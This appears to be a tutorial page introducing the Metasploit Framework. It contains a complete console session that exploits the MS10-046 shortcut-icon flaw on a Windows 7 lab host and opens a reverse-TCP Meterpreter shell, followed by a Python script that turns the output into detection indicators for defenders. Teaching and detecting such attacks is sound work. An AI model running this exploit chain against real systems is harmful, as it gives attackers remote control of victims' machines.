ONEPOIN.COM - Metasploit Framework. MSF is a framework: a collection of programs and tools for network penetration testing. Metasploit ships with a collection of exploits, payloads, libraries and interfaces that can be used to exploit computers.
Metasploit has a large collection of exploits and payloads, plus tools to package them and deliver them to the targeted host. Metasploit lets you choose an exploit from the library, choose a payload, configure the target address, the target port number and other options, and the framework packages everything together and launches it across the network at the target system. Metasploit is very flexible and helps with both testing and developing exploits. Written in the Ruby programming language, Metasploit also lets users write their own exploits and payloads and add them to the framework. Metasploit is cross-platform: it runs on Linux, Mac OS and Windows, and has exploits and payloads targeting all three as well.
Meterpreter - One of the more powerful payloads is the Metasploit Interpreter, or Meterpreter. Meterpreter gives the user command-line access to the target machine without starting a cmd.exe process; it runs entirely in memory inside the exploited process.
EXAMPLE
Reverse connection from a target running Windows 7:
Bugtraq@Ubuntu:/home/bugtraq$ sudo msfconsole
[sudo] password for bugtraq:
[*] Starting Metasploit Console...
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Love leveraging credentials? Check out bruteforcing
=[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]
+ -- --=[ 1339 exploits - 809 auxiliary - 228 post ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > show exploits
Exploits
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/local/ibstat_path 2013-09-24 excellent ibstat $PATH Privilege Escalation
aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
android/browser/webview_addjavascriptinterface 2012-12-21 normal Android Browser and WebView addJavascriptInterface Code Execution
android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good Adobe Reader for Android addJavascriptInterface Exploit
apple_ios/browser/safari_libtiff 2006-08-01 good Apple iOS MobileSafari LibTIFF Buffer Overflow
apple_ios/email/mobilemail_libtiff 2006-08-01 good Apple iOS MobileMail LibTIFF Buffer Overflow
apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent Apple iOS Default SSH Password Vulnerability
bsdi/softcart/mercantec_softcart 2004-08-19 great Mercantec SoftCart CGI Overflow
dialup/multi/login/manyargs 2001-12-12 good System V Derived /bin/login Extraneous Arguments Buffer Overflow
firefox/local/exec_shellcode 2014-03-10 normal Firefox Exec Shellcode from Privileged Javascript Shell
freebsd/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
freebsd/local/mmap 2013-06-18 great FreeBSD 9 Address Space Manipulation Privilege Escalation
freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)
freebsd/tacacs/xtacacsd_report 2008-01-08 average XTACACSD report() Buffer Overflow
freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great FreeBSD Telnet Service Encryption Key ID Buffer
.............
msf > use windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp normal Reflective DLL Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective DLL Injection, Bind TCP Stager
windows/dllinject/bind_tcp_rc4 normal Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
windows/dllinject/reverse_hop_http normal Reflective DLL Injection, Reverse Hop HTTP Stager
windows/dllinject/reverse_http normal Reflective DLL Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_tcp normal Reflective DLL Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective DLL Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective DLL Injection, Reverse TCP Stager (DNS)
windows/dllinject/reverse_tcp_rc4 normal Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
windows/dllinject/reverse_tcp_rc4_dns normal Reflective DLL Injection, Reverse TCP Stage
..................................
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.1.10 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.10
SRVHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.10:4444
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Send vulnerable clients to \\192.168.1.10\nlyZM\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*] Using URL: http://192.168.1.10:80/
[*] Server started.
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending 404 for /nlyZM/dEgPpgDCjZL.dll.2.Manifest ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] Sending stage (769536 bytes) to 192.168.1.40
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/dEgPpgDCjZL.dll
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending DLL multistatus for /nlyZM/dEgPpgDCjZL.dll ...
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.40:52843) at 2015-10-09 16:42:57 +0530
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > execute -f cmd.exe -i -H
Process 4036 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::310c:8439:5772:51c8%11
IPv4 Address. . . . . . . . . . . : 192.168.1.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::226:15ff:fe67:e6c3%11
192.168.1.1
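The console session above is written from the attacker's side, but every line of it corresponds to something a defender can observe: the victim's outbound connection to the handler on port 4444, the WebDAV PROPFIND requests for a remote share, and the DLL fetched from that share by the shortcut icon handler. The following Python script is an added example, not part of the original post or of Metasploit itself. It parses a constructed copy of the output shown above and turns it into the observations an analyst would look for in proxy, firewall, WebDAV/SMB and endpoint logs. All hosts, paths and sizes come from the transcript on this page; the log text is copied here only so the script runs offline.

```python
import re

# Constructed sample input: a subset of the msfconsole output shown above,
# copied here so the parser can run without a live session.
SAMPLE_LOG = r"""
[*] Started reverse handler on 192.168.1.10:4444
[*] Send vulnerable clients to \\192.168.1.10\nlyZM\.
[*] Using URL: http://192.168.1.10:80/
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending 404 for /nlyZM/dEgPpgDCjZL.dll.2.Manifest ...
[*] Sending stage (769536 bytes) to 192.168.1.40
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/dEgPpgDCjZL.dll
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending DLL multistatus for /nlyZM/dEgPpgDCjZL.dll ...
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.40:52843) at 2015-10-09 16:42:57 +0530
"""

# One regex per line type we care about. The UNC pattern splits the share
# into host and share name; the trailing "\." in the output is the sentence
# full stop, so the share name excludes "." on purpose.
PATTERNS = {
    "handler": re.compile(r"Started reverse handler on (\d+\.\d+\.\d+\.\d+):(\d+)"),
    "unc": re.compile(r"Send vulnerable clients to \\\\([^\\\s]+)\\([^\\\s.]+)"),
    "propfind": re.compile(r"^\[\*\] (\S+) \S+ - Received WebDAV PROPFIND request for (\S+)"),
    "dll": re.compile(r"Sending DLL multistatus for (\S+)"),
    "stage": re.compile(r"Sending stage \((\d+) bytes\) to (\S+)"),
    "session": re.compile(
        r"Meterpreter session (\d+) opened \((\S+):(\d+) -> (\S+):(\d+)\) at (.+)$"),
}


def parse_msf_log(text):
    """Extract handler, share, WebDAV requests, stage and session facts
    from msfconsole output. Returns a plain dict."""
    ev = {"propfind": [], "victims": set()}
    for line in text.splitlines():
        m = PATTERNS["handler"].search(line)
        if m:
            ev["handler"] = (m.group(1), int(m.group(2)))
            continue
        m = PATTERNS["unc"].search(line)
        if m:
            ev["unc_host"], ev["unc_share"] = m.group(1), m.group(2)
            continue
        m = PATTERNS["propfind"].search(line)
        if m:
            ev["victims"].add(m.group(1))
            ev["propfind"].append(m.group(2))
            continue
        m = PATTERNS["dll"].search(line)
        if m:
            ev["dll_path"] = m.group(1)
            continue
        m = PATTERNS["stage"].search(line)
        if m:
            ev["stage_bytes"], ev["stage_target"] = int(m.group(1)), m.group(2)
            continue
        m = PATTERNS["session"].search(line)
        if m:
            ev["session"] = {
                "id": int(m.group(1)),
                "attacker": (m.group(2), int(m.group(3))),
                "victim": (m.group(4), int(m.group(5))),
                "time": m.group(6),
            }
    return ev


def detection_indicators(ev):
    """Rephrase the parsed events as the things a defender can look for.
    Each entry maps one attacker-side line to one observable artefact."""
    out = []
    if "handler" in ev and "session" in ev:
        victim_host, _ = ev["session"]["victim"]
        handler_host, handler_port = ev["handler"]
        out.append(f"outbound TCP {victim_host} -> {handler_host}:{handler_port} "
                   f"(reverse_tcp handler; session opened {ev['session']['time']})")
    if "unc_host" in ev:
        out.append(f"client resolved UNC share \\\\{ev['unc_host']}\\{ev['unc_share']} "
                   f"over WebDAV (PROPFIND requests: {', '.join(ev['propfind'])})")
    if "dll_path" in ev:
        out.append(f"DLL loaded from remote share path {ev['dll_path']} "
                   f"(ms10_046 shortcut icon handler)")
    if "stage_bytes" in ev:
        out.append(f"{ev['stage_bytes']}-byte stage sent to {ev['stage_target']}: "
                   f"Meterpreter runs in memory, so expect no new file on disk")
    return out


if __name__ == "__main__":
    for line in detection_indicators(parse_msf_log(SAMPLE_LOG)):
        print("-", line)
```

Run it as a script to print the four observations; the point of the exercise is that each one corresponds to a log source the defender already has (WebDAV or SMB traffic to an unknown host, a DLL image loaded from a UNC path, an unexpected outbound connection from a workstation), so the same chain can be spotted without ever seeing the attacker's console.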

